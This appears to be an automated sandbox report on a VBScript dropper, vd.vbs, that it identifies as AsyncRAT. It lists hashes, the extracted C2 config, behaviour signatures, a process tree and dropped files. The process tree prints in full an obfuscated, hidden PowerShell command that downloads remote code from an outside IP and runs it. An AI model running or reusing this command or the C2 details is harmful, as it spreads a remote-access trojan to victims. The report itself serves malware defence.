Overview

overview

10

Static

static

1

vd.vbs

windows7-x64

8

vd.vbs

windows10-1703-x64

10

vd.vbs

windows10-2004-x64

10

vd.vbs

windows11-21h2-x64

10

Analysis

  • max time kernel
    284s
  • max time network
    299s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    08-07-2024 17:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    vd.vbs

  • Size

    10KB

  • MD5

    f3a9219e977b293b8cb364f8c8378284

  • SHA1

    6f5ee3933bc669d7af2acccc842c60db60be16f4

  • SHA256

    b72c0371a70cfeab0cfe44b72ef08716f6a3345cce395453e4cf931bf1f603ae

  • SHA512

    3960ed3091dfe3845832af7911c227c3e6f0cdfb97fd404224e1361ccb3d78e7b20a98fd3397ddd7e254113fb81983ca30f90cc28751390da3964a56ff2bfd91

  • SSDEEP

    192:RMVgS5D/dL6hq20J0FeAPZIxOImBYb/QFfW6V5k6uS3N7AVzSXqLFCy+/7lm70OR:RMVgS5D/dL6hq20J0FeAPZIxOImBYb/h

Score
10/10
asyncratexenewexecutionpersistencerat

Malware Config

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

ExEnew

C2

mrrobotos.duckdns.org:6606

mrrobotos.duckdns.org:7707

mrrobotos.duckdns.org:8808
Mutex

AsyncMutex_olahsklcnmdnfdsfsdfsd

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vd.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4512
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://66.225.254.182:222/reg.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1188
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://66.225.254.182:222/reg.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3120
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1564
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3520
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.ps1'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2756
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          4⤵
            PID:5032
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            4⤵
              PID:4668
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:4100
      • C:\Windows\System32\WScript.exe
        C:\Windows\System32\WScript.exe "C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.vbs"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:3988
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:712
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.ps1'"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3820
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              4⤵
                PID:2684

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          3KB

          MD5

          4180fc1109043ba70ff0e5ff26a9e1f8

          SHA1

          799702b71147d7a5e8f1b71714a2b859909767d2

          SHA256

          e1e2f4279d95c9f895c364e055769f17a9aefbb12e34cdebbefb9d345adc4836

          SHA512

          fb74451d2dc999cf2db3e458ba98c272125a086c3b9561400a182221d1678485f4a8a41521ccf954706772c6f68fcbf41774aa446ff66044da42477bfc284364

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          dff47f544506504656d0d55e2b3542c9

          SHA1

          2d0885b321dfe2812d4f657ab8fd460dd01bbd5b

          SHA256

          82cb2a81d75d0805ff887bcaf70c8df2b116c3b1d326ce8ff882182473ed60ad

          SHA512

          307b101267780a5497a44b32b7d93fd740dfdb60ec8fd2ead96d6e0347617976016a14170c3e2fc667ef8b2d377a8b5554c4c1242918c8962568ba45344702f3

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          d6ba242850a576761e0058a1179e603f

          SHA1

          c0b92075d169720fd5e3d187035c94c81fdbc790

          SHA256

          8dddb554bceefcbe085daaed00222d70630d3c0e37dc13f5605ce1a95cfaff99

          SHA512

          55e06f6fa9533879bb833226257f56a5a0b835e3e48d9fdd6693a5c87bbabfc6d039ed1e5c430a03cdc3df874c85cb4a473b1e6a087b5cf182ec4f1f3b4e37f3

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4qz3yukk.k1d.ps1
          Filesize

          1B

          MD5

          c4ca4238a0b923820dcc509a6f75849b

          SHA1

          356a192b7913b04c54574d18c28d46e6395428ab

          SHA256

          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

          SHA512

          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

          Download Submit

        • C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.bat
          Filesize

          295B

          MD5

          b032577b9070ec04b20b017a13b80fe1

          SHA1

          456e02f79a9ef827d74a33640a226903915deda3

          SHA256

          98bde1eda05213754847ccc53758e69bda57349e459adf3c05fc20ce30696eea

          SHA512

          37524791846a5a4ce3eaeaa5c0982f1a9d052ba773b12e2402a4dd9cedaaf1f438b0e12b9c7d14183263cf0b86b380822ed4210d69e0c875bccdca06ab3f03a4

          Download Submit

        • C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.ps1
          Filesize

          708KB

          MD5

          fa0c7ef78bbed4f5a0d05219583f3b6f

          SHA1

          1c584ee82ef5ac9e1fc9d991312222abbbdb3b66

          SHA256

          3f57616aad7f78dd1b087414b2219dd704866c340716791c1b20452d4fd87cde

          SHA512

          339e09113a0b51364bc86824ed8078e192d5810716f523389e9e7a16fd80fc1d23bd2e878979ff281d1f3e60cd5ae50e415c457c04cefa6a815e993cb2f10e16

          Download Submit

        • C:\Users\Public\k9vZGpST29kalJPb2RqUk9vZ.vbs
          Filesize

          1001B

          MD5

          f23c6311937368a391ae7f1a20f353f3

          SHA1

          53c02ed76746bc693ba51f11f896bbf88338172d

          SHA256

          4bd33af73be9da6aea7e8c86f1b178d8cf143ddae78379d9350ccb107e4f903d

          SHA512

          95b2964c414f4193bc20a2f1788d004fba4bf3242099be7fd416e5a88e7c18abdfcb6652083a70ab04d0824892b16991a1bc933de4743d77764988d3f0e4df35

          Download Submit

        • memory/2756-106-0x000001741D8E0000-0x000001741D8FA000-memory.dmp

          Filesize

          104KB

          Download

        • memory/3120-27-0x00007FF9BAE70000-0x00007FF9BB85C000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/3120-5-0x0000025BCF330000-0x0000025BCF352000-memory.dmp

          Filesize

          136KB

          Download

        • memory/3120-0-0x00007FF9BAE73000-0x00007FF9BAE74000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3120-28-0x00007FF9BAE73000-0x00007FF9BAE74000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3120-12-0x0000025BCF4E0000-0x0000025BCF556000-memory.dmp

          Filesize

          472KB

          Download

        • memory/3120-11-0x00007FF9BAE70000-0x00007FF9BB85C000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/3120-80-0x00007FF9BAE70000-0x00007FF9BB85C000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/3120-29-0x00007FF9BAE70000-0x00007FF9BB85C000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/3120-8-0x00007FF9BAE70000-0x00007FF9BB85C000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/4100-111-0x0000000000400000-0x0000000000416000-memory.dmp

          Filesize

          88KB

          Download

        • memory/4100-115-0x00000000059B0000-0x0000000005A42000-memory.dmp

          Filesize

          584KB

          Download

        • memory/4100-116-0x0000000005930000-0x000000000593A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/4100-119-0x0000000006890000-0x000000000692C000-memory.dmp

          Filesize

          624KB

          Download

        • memory/4100-120-0x0000000006930000-0x0000000006996000-memory.dmp

          Filesize

          408KB

          Download

        • memory/4100-114-0x0000000005D10000-0x000000000620E000-memory.dmp

          Filesize

          5.0MB

          Download